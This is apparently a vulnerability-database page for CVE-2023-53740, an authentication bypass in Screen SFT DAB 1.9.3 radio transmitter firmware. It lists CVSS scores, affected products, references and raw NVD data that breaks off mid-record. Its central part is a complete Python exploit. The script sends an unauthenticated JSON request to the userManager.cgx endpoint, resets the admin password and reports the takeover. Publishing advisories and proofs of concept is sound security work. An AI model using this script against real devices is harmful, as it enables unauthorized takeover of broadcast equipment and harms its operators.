CVE-2023-53740

Description

Screen SFT DAB 1.9.3 contains an authentication bypass vulnerability that allows attackers to change the admin password without providing the current credentials. Attackers can exploit the userManager.cgx endpoint by sending a crafted JSON request with a new MD5-hashed password to directly modify the admin account.

CVSS Details

CVSS Score

9.8

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:dbbroadcast:sft_dab_015\/c_firmware:1.9.3:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:dbbroadcast:sft_dab_015\/c:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:o:dbbroadcast:sft_dab_050\/c_firmware:1.9.3:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:dbbroadcast:sft_dab_050\/c:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:o:dbbroadcast:sft_dab_150\/c_firmware:1.9.3:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:dbbroadcast:sft_dab_150\/c:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:o:dbbroadcast:sft_dab_300\/c_firmware:1.9.3:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:dbbroadcast:sft_dab_300\/c:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:o:dbbroadcast:sft_dab_600\/c_firmware:1.9.3:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:dbbroadcast:sft_dab_600\/c:-:*:*:*:*:*:*:* - NOT VULNERABLE

Screen SFT DAB 1.9.3

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import hashlib
import json

# CVE-2023-53740 PoC - Screen SFT DAB Authentication Bypass
# Target: Screen SFT DAB 1.9.3 userManager.cgx endpoint

def generate_md5_hash(password):
    """Generate MD5 hash of the password"""
    return hashlib.md5(password.encode()).hexdigest()

def exploit(target_ip, new_password):
    """
    Exploit the authentication bypass vulnerability
    to change admin password without knowing current password
    """
    target_url = f"http://{target_ip}/userManager.cgx"
    
    # Generate MD5 hash of new password
    new_password_md5 = generate_md5_hash(new_password)
    
    # Construct malicious JSON payload
    payload = {
        "username": "admin",
        "newPassword": new_password_md5,
        "action": "changePassword"
    }
    
    headers = {
        "Content-Type": "application/json",
        "User-Agent": "Mozilla/5.0"
    }
    
    try:
        # Send the crafted request without authentication
        response = requests.post(
            target_url,
            json=payload,
            headers=headers,
            timeout=10
        )
        
        print(f"[*] Target: {target_ip}")
        print(f"[*] New Password: {new_password}")
        print(f"[*] MD5 Hash: {new_password_md5}")
        print(f"[*] Response Status: {response.status_code}")
        print(f"[*] Response: {response.text}")
        
        if response.status_code == 200:
            print("[+] Password changed successfully!")
            print("[+] You can now login with username: admin, password: " + new_password)
            return True
        else:
            print("[-] Exploitation failed")
            return False
            
    except requests.exceptions.RequestException as e:
        print(f"[-] Error: {e}")
        return False

if __name__ == "__main__":
    import sys
    if len(sys.argv) != 3:
        print(f"Usage: python {sys.argv[0]} <target_ip> <new_password>")
        sys.exit(1)
    
    target = sys.argv[1]
    password = sys.argv[2]
    exploit(target, password)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2023-53740
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2023-53740
[3] CVE Details https://www.cvedetails.com/cve/CVE-2023-53740/
[4] VulDB https://vuldb.com/cve/CVE-2023-53740
[5] https://www.dbbroadcast.com
[6] https://www.dbbroadcast.com/products/radio/sft-dab-series-compact-air/
[7] https://www.exploit-db.com/exploits/51458
[8] https://www.screen.it
[9] https://www.vulncheck.com/advisories/screen-sft-dab-authentication-bypass-via-admin-password-change
[10] https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5774.php
[11] https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5774.php

Raw JSON Data

JSON

{"cve": {"id": "CVE-2023-53740", "sourceIdentifier": "[email protected]", "published": "2025-12-10T21:16:03.233", "lastModified": "2025-12-17T18:59:09.727", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Screen SFT DAB 1.9.3 contains an authentication bypass vulnerability that allows attackers to change the admin password without providing the current credentials. Attackers can exploit the userManager.cgx endpoint by sending a crafted JSON request with a new MD5-hashed password to directly modify the admin account."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "ADJACENT", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:dbbroadcast:sft_dab_015\\/c_firmware:1.9.3:*:*:*:*:*:*:*", "matchCriteriaId": "0EE37C7E-291F-45C3-BB2E-86C9A7F39208"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:dbbroadcast:sft_dab_015\\/c:-:*:*:*:*:*:*:*", "matchCriteriaId": "9BD8A6C5-36B7-4163-824B-32DAC7AEC701"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:dbbroadcast:sft_dab_050\\/c_firmware:1.9.3:*:*:*:*:*:*:*", "matchCriteriaId": "AE43E31F-976D-420F-BF89-04F071998703"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:dbbroadcast:sft_dab_050\\/c:-:*:*:*:*:*:*:*", "matchCriteriaId": "BD0400E2-2D22-4323-A2B3-96CC2CA228FF"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:dbbroadcast:sft_dab_150\\/c_firmware:1.9.3:*:*:*:*:*:*:*", "matchCriteriaId": "CA97FA0A-3503-4A79-8170-7873A57917D0"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:dbbroadcast:sft_dab_150\\/c:-:*:*:*:*:*:*:*", "matchCriteriaId": "F2D8D14D-C6F4-43CA-A688-AF9F4522F123"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:dbbroadcast:sft_dab_300\\/c_firmware:1.9.3:*:*:*:*:*:*:*", "matchCriteriaId": "427DE942-7268-4054-967A-B2FA28AC8FCB"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:dbbroadcast:sft_dab_300\\/c:-:*:*:*:*:*:*:*", "matchCriteriaId": "7C9BA369-3D1D-4AFA-8C53-1D0B1BD4A365"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:dbbroadcast:sft_dab_600\\/c_firmware:1.9.3:*:*:*:*:*:*:*", "matchCriteriaId": "B51EAD42-9B3F-44D5-973A-4758498D1339"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:dbbroadcast:sft_dab_600\\/c:-:*:*:*:*:*:*:*", "matchCriteriaId": "97E91C9F-B55C-4B1A-BE03-D1F03AC90FE5"}]}]}], ... (truncated)